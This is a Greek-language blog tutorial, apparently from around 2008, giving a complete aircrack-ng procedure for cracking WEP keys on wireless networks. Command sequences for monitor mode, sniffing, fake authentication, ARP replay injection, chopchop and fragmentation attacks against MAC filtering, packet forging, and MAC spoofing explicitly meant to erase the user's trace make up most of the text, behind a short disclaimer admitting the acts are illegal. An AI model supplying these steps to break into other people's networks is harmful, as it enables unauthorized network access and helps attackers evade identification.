Δείτε πόση μνήμη χρησιμοποιούν τα addons σε Chrome

Live ΔΩΡΕΑΝ ολα τα αθλητικά γεγονότα(2015 updated)

Free Studio κατεβάστε, ... χωρίς να προβληματίζεστε!

Φτίαξτε Online Radio με το Shoutcast – Windows

Πλήρης Οδηγός aircrack

http://www.satspot.gr/ign_images/content/network/wifi.jpg
Σημείωση: Οι πληροφορίες που ακολουθούν στο συγκεκριμμένο άρθρο έχουν χαρακτήρα καθαρά ενημερωτικό. Η υλοποίηση του παρόντος αποτελεί νομικό αδίκημα και όποιος ακολουθήσει τις περιγραφόμενες διαδικασίες φέρει αποκλειστική ευθύνη για το αποτέλεσμα των πράξεών του. Πρόθεσή του γράφοντος είναι η ανάδειξη των αδυναμιών της κρυπτογράφησης των ασυρμάτων δικτύων στην Ελλάδα του 2008 και η πρόταση μεθόδων οχύρωσης και διασφάλισης των υπολογιστικών συστημάτων.

Γλωσσάρι :

AP [Access Point ] : Σημείο πρόσβασης από το οποίο χρήστες (clients) μπορούν να έχουν πρόσβαση σε ένα δίκτυο. Οι Wireless AP δίνουν τη δυνατότητα ασύρματης πρόσβασης σε ένα δίκτυο και σε ό,τι άλλο αυτό προσφέρει - internet, κλπ.

WEP [Wired Equivalent Protection] : Τύπος κρυπτογράφησης των ασυρμάτων δικτύων.

Πακέτο (packet) : Η ελάχιστη μονάδα συμπύκνωσης (πακεταρίσματος) των δεδομένων κατά τη διάρκεια οποιασδήποτε μεταφοράς και επικοινωνίας μεταξύ δύο υπολογιστών. Σε κάθε είδος δικτύου, υπάρχει συνεχής ροή "πακέτων" από και προς κάθε σταθμό του δικτύου. Στην περίπτωση των ασυρμάτων δικτύων, η μεταφορά αυτή γίνεται "μέσω του αέρα", χωρίς την χρήση καλωδίων. Σε περίπτωση χρήσης κλειδιού κρυπτογράφησης (για λόγους ασφαλείας) τα πακέτα αυτά είναι κρυπτογραφημένα με ένα κλειδί WEP.

MAC Address : Μια μοναδική ψηφιακή ταυτότητα που χαρακτηρίζει κάθε ασύρματη κάρτα δικτύου.(π.χ. 00:15:5F:Β6:87:97)

ESSID : Το εμφανιζόμενο όνομα ενός ασύρματου δικτύου

BSSID : Η ψηφιακή ταυτότητα (MAC Address) του router (διανεμητή) ενός ασύρματου δικτύου.

CHANNEL : Κανάλι/Συχνότητα στην οποία εκπέμπει κάθε ασύρματο δίκτυο

SNIFFING : Η διαδικασία συλλογής των πακέτων που κυκλοφορούν σε ένα δίκτυο.

Τι χρειάζεται;


Μια εγκατεστημένη έκδοση του Linux - σε κάποια από τις διανομές (π.χ. Ubuntu 7.10). Κάντε download εδώ:
ΚΩΔΙΚΑΣ
http://www.ubuntu.com/getubuntu/download


Εγκατάσταση του driver για την ασύρματη κάρτα. Για κάρτα Atheros και πολλές άλλες, χρήσιμο είναι το πακετό drivers της MadWifi, Κάντε download εδώ:
ΚΩΔΙΚΑΣ
http://sourceforge.net/project/showfile
... p_id=82936

Εγκατάσταση της συλλογής προγραμμάτων AirCrack-ng. Κάντε download εδώ:
ΚΩΔΙΚΑΣ
http://download.aircrack-ng.org/aircrac
... ta2.tar.gz (Εγκατάσταση στην Ubuntu, μπορεί να γίνει και - πληκτρολογώντας στην κονσόλα :
$ sudo apt-get install aircrack-ng
Μετά την εγκατάσταση των προγραμμάτων, στη διάθεσή μας θα έχουμε τις εξής πολύ χρήσιμες εφαρμογές κονσόλας : airmon-ng, airodump-ng, aireplay-ng, aircrack-ng

Η διαδικασία :

Θέτουμε την ασύρματη κάρτα δικτύου σε Monitor Mode (έτσι ώστε να μπορούμε να συλλέξουμε όλα τα πακέτα που κυκλοφορούν στον αέρα χωρίς αυτά αναγκαστικά να προορίζονται σε εμάς.)
$ sudo airmon-ng stop ath0
$ sudo airmon-ng start wifi0

Ελέγχουμε τα υπάρχοντα δίκτυα επιλέγοντας αυτό το οποίο μας ενδιαφέρει. Καταγράφουμε Channel, ESSID, BSSID.
$ sudo airodump-ng ath0

Ξεκινάμε το sniffing προσδιορίζοντας όλα τα στοιχεία που έχουμε ήδη καταγράψει για το δίκτυο που μας ενδιαφέρει και αποθηκεύουμε τα πακέτα σε ένα αρχείο "dump" (οι όροι με κεφαλαία αντικαθίστανται από αυτούς που έχουμε σημειώσει)
$ sudo airodump-ng -c CHANNEL --bssid BSSID --write dump ath0

Εντοπίζουμε την MAC Address της κάρτας μας πληκτρολογώντας
$ ifconfig

Χωρίς να σταματήσουμε το sniffing - σε άλλο tab της κονσόλας, θα προσπαθήσουμε άτυπα να "συνδεθούμε" με το δικτύο, έτσι ώστε εκείνο να μας στέλνει πακέτα.
$ sudo aireplay-ng -1 30 -q 1 -e ESSID -a BSSID -h MAC ath0

Επιχειρούμε να εντοπίσουμε την παραλαβή τυχόντων ARP Requests τις οποίες και αποστέλλουμε ξανά στον router, με σκοπό την επιτάχυνση παραλαβής κρυπτογραφημένων πακέτων.
$ sudo aireplay-ng -3 -b BSSID -h MAC -x 1024 ath0

Αφότου ξεκινήσει η παραλαβή/αποστολή των ARP Requests, ξεκινάμε την αποκρυπτογράφηση του κλειδιού WEP.
$ aircrack-ng -z -b BSSID dump

Μετά από μερικά λεπτά, και τη συλλογή μερικών δεκάδων χιλιάδων κρυπτογραφημένων πακέτων (ή αλλιώς IVs), το AirCrack θα σας εμφανίσει τον κωδικού WEP του κατά τ’ άλλα ασφαλούς δικτύου σας.

Καλή η θεωρία, αλλά - τουλάχιστον όσον αφορά την πρώτη απλουστευμένη εκδοχή WEP hacking - ήρθε ο καιρός να περάσουμε στην πράξη.

Τα παρακάτω είναι χρήσιμα μόνο εφ' όσον έχετε διαβάσει το πρώτο μέρος του άρθρου κι έχετε μια πλήρως εγκατεστημένη έκδοση Linux ή έχετε κάνει boot με μια εξειδικευμένη Live-CD Security Distro, π.χ. Backtrack (για την έκδοση 3-beta download κάντε κλικ εδώ κι ύστερα κάψτε το σ' ένα άδειο CD. Έτσι πιθανώς θα σας γλιτώσετε πιθανώς από επιπλέον εγκατάσταση drivers.)

* Στο παράδειγμα που ακολουθεί, έχω επιμελώς "σβήσει" κρίσιμα στοιχεία που αφορούν ESSIDs, BSSIDs και MAC Addresses (για προφανείς λόγους).

** Για μια καλύτερη άποψη επί του παραδείγματος, κάντε κλικ πάνω στις φωτογραφίες.

1) Ενεργοποίηση Monitor Mode

Εικόνα

2) Ξεκινάμε το sniffing και "τσεκάρουμε" το δίκτυο που μας ενδιαφέρει

Εικόνα

3) Επιχειρούμε Fake Authentication στο δίκτυο

Εικόνα


Στο πρώτο επιτυχυμένο fake authentication ο υπολογιστής μας - δηλαδή η ΜΑC Address μας , μπαίνει στη λίστα των stations που είναι συνδεδεμένοι με το AP.

Εικόνα

4) Ξεκινάμε την αλίευση ARP Requests

Εικόνα


Μετά από λίγο, το πρώτο ARP Request φτάνει, το aireplay-ng αναλαμβάνει τη μαζική αποστολή του προς το AP, με αποτέλεσμα ο sniffer (airodump-ng) να πλημμυρίζει σε ARP Requests δηλαδή κρυπτογραφημένα πακέτα.

Εικόνα

5) Ξεκινάμε παράλληλα το WEP Cracking

Διαλέγουμε το δίκτυο που μας ενδιαφέρει
ΚΩΔΙΚΑΣ
http://img291.imageshack.us/img291/8688
... ot6wy2.png



Παρακολουθούμε το aircrack-ng εν δράση.
ΚΩΔΙΚΑΣ
http://img291.imageshack.us/img291/567/
... t22hn8.png



6) Φτάνοντας στον στόχο μας

Καθίστε αναπαυτικά και παρακολουθείστε το aircrack-ng να βγάζει το αποτέλεσμα. Το μόνο που μένει είναι να καταγράψετε τον κωδικό κι όταν σας ζητηθεί, να τον πληκτρολογήσετε.
Για την συγκεκριμμένη περίσταση, προτείνω ένα ποτηράκι καλό αλκοόλ και μουσική υπόκρουση από Doors - κάτι σαν "This is the end, my only friend the end,...", κλπ, κλπ.

Συνοπτικά όλες οι εντολές που θα σας χρειαστούν για την αξιοποίηση της σουίτας Aircrack-ng

ΒΑΣΙΚΑ ΒΗΜΑΤΑ

1) Ενεργοποίηση της λειτουργίας Monitor Mode στην ασύρματη κάρτα
$ airmon-ng stop ath0
$ airmon-ng start wifi0

2) Συλλογή IVs και Sniffing
$ airodump-ng
-c CHANNEL
--bssid BSSID
-w FILE
ath0

3) Fake authentication
$ aireplay-ng
-1 0
-q PACKETSETS_PS [1]
-e ESSID
-a BSSID
-h MAC
ath0

4) ARP request Replay Mode
$ aireplay-ng
-3
-b BSSID
-h MAC
-x PACKETS_SEND_PS [900]
ath0

5) Ξεκλείδωμα WEP
$ aircrack-ng
- z (activate PTW vs FMS/KoreK attack)
-b BSSID
FILE

INJECTION
(αύξηση του traffic στο δίκτυο)

- Έλεγχος αν η κάρτα έχει δυνατότητες packet injection
$ aireplay-ng -9 ath0 (wifi0/wlan0)

1) ARP request Replay Mode
$ aireplay-ng
-3
-b BSSID
-h MAC
-x PACKETS_SEND_PS [900]
ath0

2) Previous ARP request Replay Mode
$ aireplay-ng
-3
-b BSSID
-h MAC
-r CAP_FILE
-x PACKETS_SEND_PS [900]
ath0

3) Interactive packet replay
a) Natural ###### ###### (χωρίς fake ID)
$ aireplay-ng
-2
-b BSSID
-d FF:FF:FF:FF:FF:FF
-t 1
ath0

β) Modified ###### ###### (χωρίς fake ID)
$ aireplay-ng
-2
-b BSSID
-d FF:FF:FF:FF:FF:FF
-t 1
-p 0841
ath0

CHOPCHOP/
FRAGMENTATION
(Αν είναι ενεργοποιημένο το MAC filtering)

1) Fragmentation
$ aireplay-ng
-5
-b BSSID
-h MAC
ath0

2) ChopChop
$ aireplay-ng
-4
-b BSSID
-h MAC
ath0

- Packet forging
$ packetforge-ng
-0
-a BSSID
-h MAC
-k 255.255.255.255
-l 255.255.255.255
-y FRAGMENT_XOR_FILE
-w ARP_REQUEST (FILE TO WRITE TO)

- Forged ARP packet injection
$ aireplay-ng
-2
-r ARP_REQUEST
ath0

MAC SPOOFING
(για να αλλάξετε την MAC Address σας και να εξαλείψετε το τελευταίο ψηφιακό σας ίχνος)
$ ifconfig ath0 down
$ ifconfig ath0 hw ether 00:11:22:33:44:55
$ ifconfig ath0 up 0
Share |
Next previous home
 

©Copyright GreekPcTeam.info. All rights reserved. Άδεια Creative Commons